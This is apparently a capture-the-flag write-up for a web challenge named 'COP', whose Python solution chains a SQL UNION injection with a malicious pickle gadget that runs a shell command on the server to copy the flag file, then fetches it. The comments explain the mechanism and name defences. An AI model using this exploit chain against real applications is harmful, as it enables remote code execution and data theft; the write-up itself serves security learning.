COP
Description: The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!
Solution:
import pickle
import base64
import os
import requests
# Shell command that the pickle gadget below passes to os.system when the
# object is deserialized. It copies flag.txt to application/static/ so the
# script can afterwards request it from the /static/ path over HTTP.
payload = "cp flag.txt application/static/achux21.txt"
class RCE:
    """Object whose pickled form runs a shell command when it is loaded.

    pickle records the result of ``__reduce__`` as "call this callable with
    these arguments" and performs that call during unpickling. This is why
    ``pickle.loads`` must never be applied to data an untrusted party can
    influence.
    """

    def __reduce__(self):
        # (callable, args) pair: unpickling evaluates os.system(payload).
        command_args = (payload,)
        return os.system, command_args
if __name__ == '__main__':
    # Pickle the gadget, then base64-encode it with the URL-safe alphabet so
    # the bytes survive being placed in a URL path segment.
    pickled_gadget = pickle.dumps(RCE())
    encoded_gadget = base64.urlsafe_b64encode(pickled_gadget).decode('ascii')

    # %27%20UNION%20SELECT%27 URL-decodes to "' UNION SELECT'", so the request
    # below appends a UNION SELECT carrying the encoded pickle to whatever
    # query the /view/ route builds from its path parameter.
    # NOTE(review): the server code is not shown on this page. Presumably the
    # route concatenates the parameter into its SQL string and later
    # base64-decodes and unpickles the selected value, which is what runs the
    # command. Confirm against the application source.
    # Defensive takeaway: a parameterized query stops the injection, and a
    # data-only format (e.g. JSON) instead of pickle for stored values stops
    # the code execution even if a row is attacker-controlled.
    injection_response = requests.get(f"http://167.99.82.136:30931/view/%27%20UNION%20SELECT%27{encoded_gadget}")

    # The command copied the flag to the static directory, so fetch it there.
    flag_response = requests.get(f"http://167.99.82.136:30931/static/achux21.txt")

    # Show the contents of the retrieved file (the flag).
    print(flag_response.text)